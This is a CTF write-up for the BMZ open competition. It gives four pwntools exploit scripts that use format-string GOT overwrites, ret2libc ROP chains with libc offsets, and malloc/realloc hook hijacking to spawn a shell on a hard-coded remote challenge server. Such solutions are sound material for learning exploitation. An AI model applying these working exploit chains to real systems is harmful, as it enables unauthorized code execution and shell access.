BMZ公开赛PWN题

pwn1

exp

#coding=utf-8
from pwn import *
context.log_level="info"
binary="./pwn1"
elf=ELF(binary)
#sh=process(binary)
sh=remote("47.242.59.61",10000)
# Address named `vuln` in the script (presumably the vulnerable function).
# The 0x0804xxxx value implies a 32-bit, non-PIE binary — confirm with checksec;
# PIE would invalidate this constant.
vuln=0x80486AE

# Write target: the GOT entry of memset. This only works while the GOT is
# writable (no Full RELRO); with Full RELRO the slot is read-only.
memset_got=elf.got['memset']
sh.recvuntil("e to BMZCTF \n")
# fmtstr_payload builds a printf %n-style write: the user-controlled format
# string is taken to sit at stack argument 10, and each {address: value} pair
# is written there. A compiler warning (-Wformat-security) or FORTIFY would
# have flagged the non-literal format string that makes this possible.
payload=fmtstr_payload(10,{
     memset_got:vuln})
sh.sendline(payload)
sh.interactive()

pwn2

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn2"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10001)

# Hard-coded, non-PIE addresses. `check` is the function both ROP chains
# return to so the overflow can be reached a second time; `pop_rdi` is
# presumably a `pop rdi; ret` gadget used to load the first argument.
check=0x040073C
pop_rdi=0x0000000000400833
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
sh.recvuntil("e you?\n")
# gdb.attach(sh,"b*0x40076C ")
# Stack-overflow padding: a 32-hex-character string (presumably a digest the
# program compares the input against) plus a NUL, then filler up to the saved
# return address. A stack canary would abort here before any chain ran.
padding="21232F297A57A5A743894A0E4A801FC3\x00"+'a'*23
# Stage 1 (ret2plt): puts(puts@got) prints the runtime address of puts, then
# control returns to `check`.
payload=padding+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(check)
sh.sendline(payload)
# A canonical x86-64 pointer has 6 significant bytes; pad to 8 for u64.
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
# Offsets for one specific libc build; they must match the remote's libc.
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17

# Stage 2 (ret2libc): system("/bin/sh") using the resolved addresses.
payload=padding+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(check)
sh.sendline(payload)
sh.interactive()

pwn3

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn3"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10002)

# Non-PIE addresses: `pop_rdi` presumably a `pop rdi; ret` gadget, `main`
# the return target so the overflow can be used twice.
pop_rdi=0x00040155b
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=0x04013FA 
# "smsg" is a menu command; the 70 short messages answered with "N" are
# presumably needed to advance the program to the state where the next
# message overruns the stack — TODO confirm against the binary.
sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
# Stage 1 (ret2plt): 17 filler bytes, then puts(puts@got) to leak libc and a
# return to main. The exact stack layout behind the 17 bytes is not visible here.
payload='a'*17+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")
sh.recvuntil("Sent.\n")
# 6 significant pointer bytes, padded to 8 for u64.
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
print "puts"+hex(puts_addr)
# Offsets for one specific libc build; they must match the remote's libc.
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17


# Second pass through the same menu sequence to reach the overflow again.
sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
# Stage 2 (ret2libc): system("/bin/sh").
payload='a'*17+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")

sh.interactive()

pwn4

exp

#coding=utf-8
from pwn import *
context.log_level="info"

binary="./pwn4"
elf=ELF(binary)
# sh=process(binary)
# Local copy of the libc the remote is assumed to run (glibc 2.23). Its symbol
# offsets are used for every libc address below; a version mismatch makes
# all of them wrong.
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
sh=remote("47.242.59.61",10003)

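def modif(addr,target):
	"""Write the low 48 bits of *target* to *addr* as three 16-bit stores.

	Each store is one change() round trip (see change()). Bits 48-63 are
	left untouched, which is enough for canonical user-space pointers.
	"""
	for i in range(3):
		# Shift-and-mask instead of slicing hex(target): slicing raises
		# ValueError when target has fewer than 12 hex digits (the slice then
		# contains "0x" or is empty) and on a Python 2 long's trailing "L".
		change(addr+2*i,(target>>(16*i))&0xffff)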

def change(addr,target):
	"""Write the 16-bit value *target* at *addr* with one name/msg round trip.

	The name input supplies the pointer that printf later finds as its 12th
	argument; the msg input is a format string that emits *target* characters
	and then stores that count through the pointer with %hn. The msg is padded
	to a fixed 32 bytes.
	"""
	sh.sendafter(" name: ",p64(addr))
	fmt="%%%dc%%12$hn"%target
	sh.sendafter("e a msg: ",fmt.ljust(32,'a'))

# First write target: the GOT entry of __stack_chk_fail. This requires a
# writable GOT (no Full RELRO); with Full RELRO the write would fault.
stack_chk_fail=elf.got['__stack_chk_fail']

# The name input is what printf later sees as its 12th argument (see change()),
# so it carries the pointer to write through.
sh.sendafter(" name: ",p64(stack_chk_fail))
# "%17$ p" prints the 17th argument (read back as the leak below);
# "%2420c%12$hn" then stores the low 16 bits of the running character count
# into __stack_chk_fail@got. The trailing "%2422222440c%1" pads the message
# to exactly 32 bytes; its effect is not evident from this file — TODO confirm.
payload="%17$ p%2420c%12$hn%2422222440c%1"
sh.sendafter("e a msg: ",payload)

#leak libc
# 15 chars = " 0x" + 12 hex digits. The value is taken to be the return
# address into __libc_start_main, 240 bytes past the function start.
libc_start_main=int(sh.recv(15),16)-240
print "libc_start_main:"+hex(libc_start_main)

# Offset of __libc_start_main in the libc-2.23 copy loaded above.
libc_base=libc_start_main-0x020750
print "libc_base:"+hex(libc_base)
# Presumably one_gadget candidate offsets for this libc; index 1 is used.
one=[0x45226,0x4527a,0xf0364,0xf1207]
one_gadget=libc_base+one[1]

realloc_hook=libc_base+libc.sym['__realloc_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
realloc=libc_base+libc.sym['realloc']
malloc=libc_base+libc.sym['malloc']
exit_got=elf.got['exit']

print "malloc:"+hex(malloc)
# Hook chain: exit@got -> malloc -> __malloc_hook -> realloc+0xc ->
# __realloc_hook -> one_gadget. Entering realloc past its first instructions
# is presumably a stack adjustment for the gadget's constraints — TODO confirm.
# Writable __malloc_hook/__realloc_hook exist only in glibc before 2.34.
modif(realloc_hook,one_gadget) #
modif(malloc_hook,realloc+0xc)
modif(exit_got,malloc)

#exploit 
# gdb.attach(sh,"b *0x400957")
# Final round with benign inputs so the program reaches exit() and the chain runs.
sh.sendafter(" name: ","fkbugs")
sh.sendafter("e a msg: ","%p")

sh.interactive()
